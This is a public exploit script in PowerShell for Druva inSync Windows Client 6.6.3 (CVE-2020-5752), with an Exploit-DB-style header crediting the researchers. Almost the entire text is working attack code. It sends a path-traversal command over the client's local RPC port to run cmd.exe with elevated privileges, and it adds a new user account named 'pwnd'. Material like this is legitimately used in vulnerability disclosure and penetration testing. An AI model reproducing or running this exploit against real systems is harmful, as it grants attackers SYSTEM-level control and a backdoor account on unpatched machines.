# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) # Date: 2020-12-03 # Exploit Author: 1F98D # Original Author: Matteo Malvica # Vendor Homepage: druva.com # Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi # Version: 6.6.3 # Tested on: Windows 10 (x64) # CVE: CVE-2020-5752 # References: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/ # Druva inSync exposes an RPC service which is vulnerable to a command injection attack. $ErrorActionPreference = "Stop" $cmd = "net user pwnd /add" $s = New-Object System.Net.Sockets.Socket( [System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp ) $s.Connect("127.0.0.1", 6064) $header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]") $rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0") $command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd"); $length = [System.BitConverter]::GetBytes($command.Length); $s.Send($header) $s.Send($rpcType) $s.Send($length) $s.Send($command)